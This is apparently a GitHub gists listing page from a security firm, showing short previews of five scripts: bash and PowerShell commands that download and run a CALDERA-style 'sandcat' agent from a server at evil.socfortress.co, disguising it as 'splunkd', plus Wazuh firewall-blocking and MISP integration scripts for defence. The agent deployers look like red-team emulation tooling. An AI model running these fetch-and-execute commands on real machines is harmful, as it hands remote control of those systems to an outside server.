OpenSecureCo
OpenSecureCo
/ gist:e740ed40abeb207c5aa915192b532269
Created
August 3, 2022 02:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| server="http://evil.socfortress.co:8888"; | |
| curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd; | |
| chmod +x splunkd; | |
| ./splunkd -server $server -group red -v |
OpenSecureCo
/ windows.ps1
Created
August 3, 2022 02:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $server="http://evil.socfortress.co:8888"; | |
| $url="$server/file/download"; | |
| $wc=New-Object System.Net.WebClient; | |
| $wc.Headers.add("platform","windows"); | |
| $wc.Headers.add("file","sandcat.go"); | |
| $data=$wc.DownloadData($url); | |
| $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"",""); | |
| get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f; | |
| rm -force "C:\Users\Public\$name.exe" -ea ignore; | |
| [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null; |
OpenSecureCo
/ windowsfirewall.ps1
Last active
April 25, 2022 02:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################ | |
| ##Script to add/remove destination ip to windows firewall | |
| ################################ | |
| ########## | |
| ##info@opensecure.co | |
| ########## | |
| # Read the Alert that triggered the Active Response in manager and convert to Array | |
| $INPUT_JSON = Read-Host | |
| $INPUT_ARRAY = $INPUT_JSON | ConvertFrom-Json | |
| $INPUT_ARRAY = $INPUT_ARRAY | ConvertFrom-Json |
OpenSecureCo
/ firewall.cmd
Created
April 24, 2022 23:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Simple script to run Windows Firewall Block | |
| :: The script executes a powershell script and appends output. | |
| @ECHO OFF | |
| ECHO. | |
| "C:\Program Files\PowerShell\7\"pwsh.exe -executionpolicy ByPass -File "C:\Program Files (x86)\ossec-agent\active-response\bin\windowsfirewall.ps1" | |
| :Exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/var/ossec/framework/python/bin/python3 | |
| ## MISP API Integration | |
| # | |
| import sys | |
| import os | |
| from socket import socket, AF_UNIX, SOCK_DGRAM | |
| from datetime import date, datetime, timedelta | |
| import time | |
| import requests | |
| from requests.exceptions import ConnectionError |